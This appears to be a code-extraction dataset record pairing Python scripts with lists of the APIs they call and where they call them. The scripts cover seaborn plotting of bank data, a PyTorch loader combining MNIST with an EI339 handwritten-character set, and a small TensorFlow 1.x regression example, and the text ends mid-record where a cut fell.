'marital', 'education', 'default', 'housing', 'loan', 'contact',
'day_of_week', 'poutcome', 'y', 'month_integer'],
dtype='object')
'''
data.to_csv('bank_data_feat_select_test.csv')
|
[
"matplotlib.pyplot.show",
"pandas.read_csv",
"matplotlib.pyplot.subplots",
"seaborn.countplot",
"seaborn.distplot",
"numpy.random.permutation",
"seaborn.set"
] |
[((187, 212), 'seaborn.set', 'sns.set', ([], {'color_codes': '(True)'}), '(color_codes=True)\n', (194, 212), True, 'import seaborn as sns\n'), ((493, 530), 'pandas.read_csv', 'pd.read_csv', (['file_name'], {'delimiter': '""","""'}), "(file_name, delimiter=',')\n", (504, 530), True, 'import pandas as pd\n'), ((1634, 1665), 'seaborn.countplot', 'sns.countplot', (['y'], {'label': '"""Count"""'}), "(y, label='Count')\n", (1647, 1665), True, 'import seaborn as sns\n'), ((1901, 1911), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1909, 1911), True, 'import matplotlib.pyplot as plt\n'), ((1961, 2008), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(2)', 'ncols': '(2)', 'figsize': '(15, 6)'}), '(nrows=2, ncols=2, figsize=(15, 6))\n', (1973, 2008), True, 'import matplotlib.pyplot as plt\n'), ((2966, 2976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2974, 2976), True, 'import matplotlib.pyplot as plt\n'), ((3156, 3186), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 15)'}), '(figsize=(15, 15))\n', (3168, 3186), True, 'import matplotlib.pyplot as plt\n'), ((3336, 3346), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3344, 3346), True, 'import matplotlib.pyplot as plt\n'), ((1529, 1562), 'numpy.random.permutation', 'np.random.permutation', (['data.index'], {}), '(data.index)\n', (1550, 1562), True, 'import numpy as np\n'), ((2038, 2116), 'seaborn.distplot', 'sns.distplot', (["data['month_integer']"], {'kde': '(False)', 'color': '"""#ff3300"""', 'ax': 'axes[0][0]'}), "(data['month_integer'], kde=False, color='#ff3300', ax=axes[0][0])\n", (2050, 2116), True, 'import seaborn as sns\n'), ((2290, 2358), 'seaborn.distplot', 'sns.distplot', (["data['age']"], {'kde': '(False)', 'color': '"""#3366ff"""', 'ax': 'axes[0][1]'}), "(data['age'], kde=False, color='#3366ff', ax=axes[0][1])\n", (2302, 2358), True, 'import seaborn as sns\n'), ((2526, 2599), 'seaborn.distplot', 'sns.distplot', (["data['campaign']"], {'kde': '(False)', 'color': '"""#546E7A"""', 'ax': 'axes[1][0]'}), "(data['campaign'], kde=False, color='#546E7A', ax=axes[1][0])\n", (2538, 2599), True, 'import seaborn as sns\n'), ((2745, 2813), 'seaborn.distplot', 'sns.distplot', (["data['job']"], {'kde': '(False)', 'color': '"""#33ff66"""', 'ax': 'axes[1][1]'}), "(data['job'], kde=False, color='#33ff66', ax=axes[1][1])\n", (2757, 2813), True, 'import seaborn as sns\n')]
|
import os
import inspect
from tqdm import tqdm
import numpy as np
import typing
import cv2
import torchvision
import torch
from PIL import Image
from torch.utils.data import Dataset, DataLoader
# root (correct even if called)
CRT_ABS_PATH = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# keys of dataset
KEYS = ["MNIST", "EI339", "combined"]
# relative to root/
PATH_TO_DATASET = {"MNIST": "MNIST/",
"EI339": "EI339-CN dataset sjtu/",
"MNIST+EI339": "MNIST+EI339/", }
# relative to root/PATH_TO_DATASET
DATASET_MAPPING_FN = {"MNIST": None,
"combined": None,
"EI339": {"train": {"data": "mapping/train_data.npy",
"label": "mapping/train_label.npy"},
"test": {"data": "mapping/test_data.npy",
"label": "mapping/test_label.npy"}, }, }
# relative to root/PATH_TO_DATASET
DATASET_SPLITS = {"MNIST": {"raw": "raw/",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"EI339": {"raw": "",
"train": "processed/training.pt",
"test": "processed/test.pt"},
"MNIST+EI339": {"raw": None,
"train": "training.pt",
"test": "test.pt"}, }
"""
~ root (CRT_ABS_PATH)
+ --- PATH_TO_DATASET
+ --- DATASET_MAPPING_FN
+ --- DATASET_SPLITS
"""
def __ei339_generate_raw_mappings__() -> \
typing.Tuple[typing.Tuple[np.ndarray, np.ndarray],
typing.Tuple[np.ndarray, np.ndarray]]:
abs_train_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["data"])
abs_train_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["train"]["label"])
abs_test_data_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["data"])
abs_test_label_fn = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_MAPPING_FN["EI339"]["test"]["label"])
if os.path.exists(path=abs_train_data_fn) and os.path.exists(path=abs_train_label_fn) \
and os.path.exists(path=abs_test_data_fn) and os.path.exists(path=abs_test_label_fn):
# print("Mappings Loaded from File")
return (np.load(abs_train_data_fn), np.load(abs_train_label_fn)), \
(np.load(abs_test_data_fn), np.load(abs_test_label_fn))
__ensure_path_validation__(abs_train_data_fn)
__ensure_path_validation__(abs_train_label_fn)
__ensure_path_validation__(abs_test_data_fn)
__ensure_path_validation__(abs_test_label_fn)
train_data_map, train_label_map = [], []
test_data_map, test_label_map = [], []
for label_num in tqdm(range(1, 10 + 1)):
# print("Mapping Images of Label %d" % label_num)
abs_path_to_file_folder = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"],
DATASET_SPLITS["EI339"]["raw"], str(label_num))
abs_path_to_tr_files = os.path.join(abs_path_to_file_folder, "training/")
path_to_test_files = os.path.join(abs_path_to_file_folder, "testing/")
save_label_num = 0 if 10 == label_num else label_num
save_label_num += 10
# Training Data
for file in os.listdir(abs_path_to_tr_files):
abs_path_to_tr_file = os.path.join(abs_path_to_tr_files, file)
train_data_map.append(abs_path_to_tr_file)
train_label_map.append(save_label_num)
# Test Data
for file in os.listdir(path_to_test_files):
abs_path_to_test_file = os.path.join(path_to_test_files, file)
test_data_map.append(abs_path_to_test_file)
test_label_map.append(save_label_num)
train_data_map = np.array(train_data_map) # (cnt,) <str> as <U129>
train_label_map = np.array(train_label_map) # (cnt,) <np.int32>
train_idx = np.arange(train_label_map.size)
np.random.shuffle(train_idx)
train_data_map = train_data_map[train_idx]
train_label_map = train_label_map[train_idx]
print("EI339: Train Data Mapping Shuffled")
test_data_map = np.array(test_data_map) # (cnt,) <str> as <U129>
test_label_map = np.array(test_label_map) # (cnt,) <int>
test_idx = np.arange(test_label_map.size)
np.random.shuffle(test_idx)
test_data_map = test_data_map[test_idx]
test_label_map = test_label_map[test_idx]
print("EI339: Test Data Mapping Shuffled")
np.save(arr=train_data_map, file=abs_train_data_fn)
np.save(arr=train_label_map, file=abs_train_label_fn)
np.save(arr=test_data_map, file=abs_test_data_fn)
np.save(arr=test_label_map, file=abs_test_label_fn)
return (train_data_map, train_label_map), (test_data_map, test_label_map)
def __ei339_load_raw_image__(path: str) -> np.ndarray:
img = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img, dsize=(28, 28))
# _, img = cv2.threshold(img, thresh=128, maxval=255, type=cv2.THRESH_BINARY)
img = 255 - img
return img
def __ensure_path_validation__(filename_with_path: str) -> None:
path = os.path.split(filename_with_path)[0]
if not os.path.exists(path):
os.mkdir(path)
assert os.path.exists(path), "[Error] Access to Directory \"%s\" is Denied" % path
def __ei339_process_raw_data__() -> None:
abs_train_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
abs_test_dataset_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
if os.path.exists(abs_train_dataset_path) and os.path.exists(abs_test_dataset_path):
return
__ensure_path_validation__(abs_train_dataset_path)
__ensure_path_validation__(abs_test_dataset_path)
(train_data_fn, train_label), (test_data_fn, test_label) = \
__ei339_generate_raw_mappings__()
# train data
train_data = []
for file in tqdm(train_data_fn):
train_data.append(__ei339_load_raw_image__(path=file))
train_data = np.array(train_data)
train_data = torch.from_numpy(train_data) # torch.Size([7385, 28, 28])
train_label = torch.from_numpy(train_label).long() # torch.Size([7385])
# print(train_data.shape, train_label.shape)
# test data
test_data = []
for file in tqdm(test_data_fn):
test_data.append(__ei339_load_raw_image__(path=file))
test_data = np.array(test_data)
test_data = torch.from_numpy(test_data) # torch.Size([2034, 28, 28])
test_label = torch.from_numpy(test_label).long() # torch.Size([2034])
# print(test_data.shape, test_label.shape)
torch.save((train_data, train_label), f=abs_train_dataset_path)
torch.save((test_data, test_label), f=abs_test_dataset_path)
print("EI339: Train & Test Data Saved")
def __combine_dataset__(data_fn_list: list, output_filename: str) -> None:
assert len(data_fn_list) > 1, "[Error] Given to-Combine List if of Length 1"
if os.path.exists(output_filename):
return
__ensure_path_validation__(output_filename)
for file in data_fn_list:
if not os.path.exists(file):
raise RuntimeError("[Error] File \"%s\" NOT Exist" % file)
data_list, targets_list = [], []
for file in data_fn_list:
_data, _target = torch.load(file)
data_list.append(_data)
targets_list.append(_target)
data = torch.cat(data_list, dim=0)
targets = torch.cat(targets_list, dim=0)
torch.save((data, targets), f=output_filename)
print("Dataset Combined")
for file in data_fn_list:
print("\tFrom \"%s\"" % file)
print("\tTo \"%s\"" % output_filename)
class TorchLocalDataLoader(Dataset):
def __init__(self, train: bool = True,
transform: torchvision.transforms.transforms.Compose = None,
mnist: bool = False, ei339: bool = False):
assert (mnist or ei339) is True, "[Error] No Dataset is Selected"
self.transform = transform
self.mnist_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"])
self.mnist_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["test"])
self.ei339_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["train"])
self.ei339_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["EI339"], DATASET_SPLITS["EI339"]["test"])
self.combined_train_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["train"])
self.combined_test_path = os.path.join(
CRT_ABS_PATH, PATH_TO_DATASET["MNIST+EI339"], DATASET_SPLITS["MNIST+EI339"]["test"])
# initialize dataset: MNIST, EI339, combined
torchvision.datasets.MNIST(CRT_ABS_PATH, train=True, download=True)
torchvision.datasets.MNIST(CRT_ABS_PATH, train=False, download=True)
__ei339_process_raw_data__()
__combine_dataset__([self.mnist_train_path, self.ei339_train_path],
self.combined_train_path)
__combine_dataset__([self.mnist_test_path, self.ei339_test_path],
self.combined_test_path)
# get data from file, save to self.data, self.targets (type Tensor)
if mnist is True and ei339 is True:
data_file = self.combined_train_path if train else self.combined_test_path
self.data, self.targets = torch.load(data_file)
elif mnist is True:
data_file = self.mnist_train_path if train else self.mnist_test_path
self.data, self.targets = torch.load(data_file)
else: # ei339 is True
data_file = self.ei339_train_path if train else self.ei339_test_path
self.data, self.targets = torch.load(data_file)
def __len__(self):
return len(self.targets)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
img, target = self.data[idx], int(self.targets[idx])
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.numpy(), mode='L')
if self.transform is not None:
img = self.transform(img)
return img, target
if "__main__" == __name__:
# # see MNIST processed file data structure
# # Tuple[Tensor(Size([60000, 28, 28])), Tensor(Size([60000]))]
# a = torch.load(os.path.join(PATH_TO_DATASET["MNIST"], DATASET_SPLITS["MNIST"]["train"]))
# print(type(a))
# print(a[0].shape)
# print(type(a[0][0]))
# print(a[1].shape)
# print(type(a[1][0]))
# __ei339_process_raw_data__()
loader = TorchLocalDataLoader(
train=True,
transform=torchvision.transforms.Compose([
torchvision.transforms.ToTensor(),
torchvision.transforms.Normalize((0.1307,), (0.3081,)), ]),
mnist=True,
ei339=True
)
train_loader = DataLoader(dataset=loader, batch_size=30, shuffle=True)
|
[
"os.mkdir",
"numpy.load",
"torch.cat",
"numpy.arange",
"torchvision.transforms.Normalize",
"os.path.join",
"torch.utils.data.DataLoader",
"torch.load",
"os.path.exists",
"torch.is_tensor",
"cv2.resize",
"numpy.random.shuffle",
"tqdm.tqdm",
"numpy.save",
"inspect.currentframe",
"torchvision.datasets.MNIST",
"os.listdir",
"torch.from_numpy",
"torch.save",
"cv2.imread",
"numpy.array",
"os.path.split",
"torchvision.transforms.ToTensor"
] |
[((1773, 1876), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['data'])\n", (1785, 1876), False, 'import os\n'), ((1906, 2010), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['train']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['train']['label'])\n", (1918, 2010), False, 'import os\n'), ((2038, 2140), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['data']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['data'])\n", (2050, 2140), False, 'import os\n'), ((2169, 2272), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_MAPPING_FN['EI339']['test']['label']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_MAPPING_FN[\n 'EI339']['test']['label'])\n", (2181, 2272), False, 'import os\n'), ((3997, 4021), 'numpy.array', 'np.array', (['train_data_map'], {}), '(train_data_map)\n', (4005, 4021), True, 'import numpy as np\n'), ((4070, 4095), 'numpy.array', 'np.array', (['train_label_map'], {}), '(train_label_map)\n', (4078, 4095), True, 'import numpy as np\n'), ((4133, 4164), 'numpy.arange', 'np.arange', (['train_label_map.size'], {}), '(train_label_map.size)\n', (4142, 4164), True, 'import numpy as np\n'), ((4169, 4197), 'numpy.random.shuffle', 'np.random.shuffle', (['train_idx'], {}), '(train_idx)\n', (4186, 4197), True, 'import numpy as np\n'), ((4362, 4385), 'numpy.array', 'np.array', (['test_data_map'], {}), '(test_data_map)\n', (4370, 4385), True, 'import numpy as np\n'), ((4433, 4457), 'numpy.array', 'np.array', (['test_label_map'], {}), '(test_label_map)\n', (4441, 4457), True, 'import numpy as np\n'), ((4489, 4519), 'numpy.arange', 'np.arange', (['test_label_map.size'], {}), '(test_label_map.size)\n', (4498, 4519), True, 'import numpy as np\n'), ((4524, 4551), 'numpy.random.shuffle', 'np.random.shuffle', (['test_idx'], {}), '(test_idx)\n', (4541, 4551), True, 'import numpy as np\n'), ((4693, 4744), 'numpy.save', 'np.save', ([], {'arr': 'train_data_map', 'file': 'abs_train_data_fn'}), '(arr=train_data_map, file=abs_train_data_fn)\n', (4700, 4744), True, 'import numpy as np\n'), ((4749, 4802), 'numpy.save', 'np.save', ([], {'arr': 'train_label_map', 'file': 'abs_train_label_fn'}), '(arr=train_label_map, file=abs_train_label_fn)\n', (4756, 4802), True, 'import numpy as np\n'), ((4807, 4856), 'numpy.save', 'np.save', ([], {'arr': 'test_data_map', 'file': 'abs_test_data_fn'}), '(arr=test_data_map, file=abs_test_data_fn)\n', (4814, 4856), True, 'import numpy as np\n'), ((4861, 4912), 'numpy.save', 'np.save', ([], {'arr': 'test_label_map', 'file': 'abs_test_label_fn'}), '(arr=test_label_map, file=abs_test_label_fn)\n', (4868, 4912), True, 'import numpy as np\n'), ((5059, 5097), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_GRAYSCALE'], {}), '(path, cv2.IMREAD_GRAYSCALE)\n', (5069, 5097), False, 'import cv2\n'), ((5108, 5139), 'cv2.resize', 'cv2.resize', (['img'], {'dsize': '(28, 28)'}), '(img, dsize=(28, 28))\n', (5118, 5139), False, 'import cv2\n'), ((5439, 5459), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5453, 5459), False, 'import os\n'), ((5588, 5679), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (5600, 5679), False, 'import os\n'), ((5712, 5802), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (5724, 5802), False, 'import os\n'), ((6182, 6201), 'tqdm.tqdm', 'tqdm', (['train_data_fn'], {}), '(train_data_fn)\n', (6186, 6201), False, 'from tqdm import tqdm\n'), ((6283, 6303), 'numpy.array', 'np.array', (['train_data'], {}), '(train_data)\n', (6291, 6303), True, 'import numpy as np\n'), ((6321, 6349), 'torch.from_numpy', 'torch.from_numpy', (['train_data'], {}), '(train_data)\n', (6337, 6349), False, 'import torch\n'), ((6558, 6576), 'tqdm.tqdm', 'tqdm', (['test_data_fn'], {}), '(test_data_fn)\n', (6562, 6576), False, 'from tqdm import tqdm\n'), ((6656, 6675), 'numpy.array', 'np.array', (['test_data'], {}), '(test_data)\n', (6664, 6675), True, 'import numpy as np\n'), ((6692, 6719), 'torch.from_numpy', 'torch.from_numpy', (['test_data'], {}), '(test_data)\n', (6708, 6719), False, 'import torch\n'), ((6877, 6940), 'torch.save', 'torch.save', (['(train_data, train_label)'], {'f': 'abs_train_dataset_path'}), '((train_data, train_label), f=abs_train_dataset_path)\n', (6887, 6940), False, 'import torch\n'), ((6945, 7005), 'torch.save', 'torch.save', (['(test_data, test_label)'], {'f': 'abs_test_dataset_path'}), '((test_data, test_label), f=abs_test_dataset_path)\n', (6955, 7005), False, 'import torch\n'), ((7215, 7246), 'os.path.exists', 'os.path.exists', (['output_filename'], {}), '(output_filename)\n', (7229, 7246), False, 'import os\n'), ((7639, 7666), 'torch.cat', 'torch.cat', (['data_list'], {'dim': '(0)'}), '(data_list, dim=0)\n', (7648, 7666), False, 'import torch\n'), ((7681, 7711), 'torch.cat', 'torch.cat', (['targets_list'], {'dim': '(0)'}), '(targets_list, dim=0)\n', (7690, 7711), False, 'import torch\n'), ((7717, 7763), 'torch.save', 'torch.save', (['(data, targets)'], {'f': 'output_filename'}), '((data, targets), f=output_filename)\n', (7727, 7763), False, 'import torch\n'), ((11328, 11383), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'loader', 'batch_size': '(30)', 'shuffle': '(True)'}), '(dataset=loader, batch_size=30, shuffle=True)\n', (11338, 11383), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((2284, 2322), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_data_fn'}), '(path=abs_train_data_fn)\n', (2298, 2322), False, 'import os\n'), ((2327, 2366), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_train_label_fn'}), '(path=abs_train_label_fn)\n', (2341, 2366), False, 'import os\n'), ((2385, 2422), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_data_fn'}), '(path=abs_test_data_fn)\n', (2399, 2422), False, 'import os\n'), ((2427, 2465), 'os.path.exists', 'os.path.exists', ([], {'path': 'abs_test_label_fn'}), '(path=abs_test_label_fn)\n', (2441, 2465), False, 'import os\n'), ((3242, 3292), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""training/"""'], {}), "(abs_path_to_file_folder, 'training/')\n", (3254, 3292), False, 'import os\n'), ((3322, 3371), 'os.path.join', 'os.path.join', (['abs_path_to_file_folder', '"""testing/"""'], {}), "(abs_path_to_file_folder, 'testing/')\n", (3334, 3371), False, 'import os\n'), ((3507, 3539), 'os.listdir', 'os.listdir', (['abs_path_to_tr_files'], {}), '(abs_path_to_tr_files)\n', (3517, 3539), False, 'import os\n'), ((3762, 3792), 'os.listdir', 'os.listdir', (['path_to_test_files'], {}), '(path_to_test_files)\n', (3772, 3792), False, 'import os\n'), ((5335, 5368), 'os.path.split', 'os.path.split', (['filename_with_path'], {}), '(filename_with_path)\n', (5348, 5368), False, 'import os\n'), ((5383, 5403), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (5397, 5403), False, 'import os\n'), ((5413, 5427), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (5421, 5427), False, 'import os\n'), ((5814, 5852), 'os.path.exists', 'os.path.exists', (['abs_train_dataset_path'], {}), '(abs_train_dataset_path)\n', (5828, 5852), False, 'import os\n'), ((5857, 5894), 'os.path.exists', 'os.path.exists', (['abs_test_dataset_path'], {}), '(abs_test_dataset_path)\n', (5871, 5894), False, 'import os\n'), ((7542, 7558), 'torch.load', 'torch.load', (['file'], {}), '(file)\n', (7552, 7558), False, 'import torch\n'), ((8267, 8358), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['train'])\n", (8279, 8358), False, 'import os\n'), ((8398, 8488), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST']", "DATASET_SPLITS['MNIST']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST'], DATASET_SPLITS['MNIST'\n ]['test'])\n", (8410, 8488), False, 'import os\n'), ((8529, 8620), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['train'])\n", (8541, 8620), False, 'import os\n'), ((8660, 8750), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['EI339']", "DATASET_SPLITS['EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['EI339'], DATASET_SPLITS['EI339'\n ]['test'])\n", (8672, 8750), False, 'import os\n'), ((8794, 8897), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['train']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['train'])\n", (8806, 8897), False, 'import os\n'), ((8940, 9042), 'os.path.join', 'os.path.join', (['CRT_ABS_PATH', "PATH_TO_DATASET['MNIST+EI339']", "DATASET_SPLITS['MNIST+EI339']['test']"], {}), "(CRT_ABS_PATH, PATH_TO_DATASET['MNIST+EI339'], DATASET_SPLITS[\n 'MNIST+EI339']['test'])\n", (8952, 9042), False, 'import os\n'), ((9113, 9180), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(True)', 'download': '(True)'}), '(CRT_ABS_PATH, train=True, download=True)\n', (9139, 9180), False, 'import torchvision\n'), ((9189, 9257), 'torchvision.datasets.MNIST', 'torchvision.datasets.MNIST', (['CRT_ABS_PATH'], {'train': '(False)', 'download': '(True)'}), '(CRT_ABS_PATH, train=False, download=True)\n', (9215, 9257), False, 'import torchvision\n'), ((10262, 10282), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (10277, 10282), False, 'import torch\n'), ((290, 312), 'inspect.currentframe', 'inspect.currentframe', ([], {}), '()\n', (310, 312), False, 'import inspect\n'), ((3575, 3615), 'os.path.join', 'os.path.join', (['abs_path_to_tr_files', 'file'], {}), '(abs_path_to_tr_files, file)\n', (3587, 3615), False, 'import os\n'), ((3830, 3868), 'os.path.join', 'os.path.join', (['path_to_test_files', 'file'], {}), '(path_to_test_files, file)\n', (3842, 3868), False, 'import os\n'), ((6398, 6427), 'torch.from_numpy', 'torch.from_numpy', (['train_label'], {}), '(train_label)\n', (6414, 6427), False, 'import torch\n'), ((6767, 6795), 'torch.from_numpy', 'torch.from_numpy', (['test_label'], {}), '(test_label)\n', (6783, 6795), False, 'import torch\n'), ((7356, 7376), 'os.path.exists', 'os.path.exists', (['file'], {}), '(file)\n', (7370, 7376), False, 'import os\n'), ((9798, 9819), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9808, 9819), False, 'import torch\n'), ((2528, 2554), 'numpy.load', 'np.load', (['abs_train_data_fn'], {}), '(abs_train_data_fn)\n', (2535, 2554), True, 'import numpy as np\n'), ((2556, 2583), 'numpy.load', 'np.load', (['abs_train_label_fn'], {}), '(abs_train_label_fn)\n', (2563, 2583), True, 'import numpy as np\n'), ((2604, 2629), 'numpy.load', 'np.load', (['abs_test_data_fn'], {}), '(abs_test_data_fn)\n', (2611, 2629), True, 'import numpy as np\n'), ((2631, 2657), 'numpy.load', 'np.load', (['abs_test_label_fn'], {}), '(abs_test_label_fn)\n', (2638, 2657), True, 'import numpy as np\n'), ((9967, 9988), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (9977, 9988), False, 'import torch\n'), ((10139, 10160), 'torch.load', 'torch.load', (['data_file'], {}), '(data_file)\n', (10149, 10160), False, 'import torch\n'), ((11157, 11190), 'torchvision.transforms.ToTensor', 'torchvision.transforms.ToTensor', ([], {}), '()\n', (11188, 11190), False, 'import torchvision\n'), ((11204, 11258), 'torchvision.transforms.Normalize', 'torchvision.transforms.Normalize', (['(0.1307,)', '(0.3081,)'], {}), '((0.1307,), (0.3081,))\n', (11236, 11258), False, 'import torchvision\n')]
|
# -*- coding utf-8 -*-
import cv2
import os
import numpy as np
from sklearn.model_selection import train_test_split
import random
import tensorflow as tf
def read_data(img_path, image_h = 64, image_w = 64):
image_data = []
label_data = []
image = cv2.imread(img_path)
#cv2.namedWindow("Image")
#cv2.imshow("Image",image)
#cv2.waitKey(0)
h,w,_ = image.shape
longest_edge = max(h,w)
top, bottom, left, right = (0, 0, 0, 0)
dh,dw = (0,0)
if h < longest_edge:
dh = longest_edge - h
top = dh // 2
bottom = dh - top
elif w < longest_edge:
dw = longest_edge - w
left = dw // 2
right = dw - left
else:
pass
image_pad = cv2.copyMakeBorder(image, top, bottom, left, right, cv2.BORDER_CONSTANT, value=[0, 0, 0])
image = cv2.resize(image_pad, (image_h, image_w))
image_data.append(image)
label_data.append(img_path)
image_data = np.array(image_data)
train_x, test_x, train_y, test_y = train_test_split(image_data, label_data, test_size=0.05,
random_state=random.randint(0, 100))
X = tf.placeholder(tf.float32,[None, 64, 64, 3])
Y = tf.placeholder(tf.float32, [None, 2])
return Y
#img_path = '4833.jpg'
#print(read_data(img_path))
x_data = np.float32(np.random.rand(2,100))
y_data = np.dot([0.100, 0.200], x_data) + 0.300
b = tf.Variable(tf.zeros([1]), name='B')
W = tf.Variable(tf.random_uniform([1, 2], -1.0, 1.0), name='W')
y = tf.add(tf.matmul(W, x_data, name='MatMul'), b ,name='add')
loss = tf.reduce_mean(tf.square(tf.subtract(y, y_data, name='Sub'), name='Square'), name='ReduceMean')
optimizer = tf.train.GradientDescentOptimizer(0.001, name='Optimizer')
train = optimizer.minimize(loss, name='minimize')
summaries = [tf.summary.histogram('W',W), tf.summary.histogram('b', b), tf.summary.scalar('loss', loss)]
summary_op = tf.summary.merge(summaries)
print(summary_op)
|
[
"tensorflow.random_uniform",
"numpy.dot",
"tensorflow.summary.scalar",
"tensorflow.subtract",
"random.randint",
"cv2.copyMakeBorder",
"cv2.imread",
"tensorflow.placeholder",
"tensorflow.zeros",
"numpy.array",
"tensorflow.matmul",
"tensorflow.summary.histogram",
"numpy.random.rand",
"tensorflow.train.GradientDescentOptimizer",
"tensorflow.summary.merge",
"cv2.resize"
] |
[((1750, 1808), 'tensorflow.train.GradientDescentOptimizer', 'tf.train.GradientDescentOptimizer', (['(0.001)'], {'name': '"""Optimizer"""'}), "(0.001, name='Optimizer')\n", (1783, 1808), True, 'import tensorflow as tf\n'), ((1982, 2009), 'tensorflow.summary.merge', 'tf.summary.merge', (['summaries'], {}), '(summaries)\n', (1998, 2009), True, 'import tensorflow as tf\n'), ((271, 291), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (281, 291), False, 'import cv2\n'), ((753, 846), 'cv2.copyMakeBorder', 'cv2.copyMakeBorder', (['image', 'top', 'bottom', 'left', 'right', 'cv2.BORDER_CONSTANT'], {'value': '[0, 0, 0]'}), '(image, top, bottom, left, right, cv2.BORDER_CONSTANT,\n value=[0, 0, 0])\n', (771, 846), False, 'import cv2\n'), ((856, 897), 'cv2.resize', 'cv2.resize', (['image_pad', '(image_h, image_w)'], {}), '(image_pad, (image_h, image_w))\n', (866, 897), False, 'import cv2\n'), ((981, 1001), 'numpy.array', 'np.array', (['image_data'], {}), '(image_data)\n', (989, 1001), True, 'import numpy as np\n'), ((1202, 1247), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 64, 64, 3]'], {}), '(tf.float32, [None, 64, 64, 3])\n', (1216, 1247), True, 'import tensorflow as tf\n'), ((1256, 1293), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '[None, 2]'], {}), '(tf.float32, [None, 2])\n', 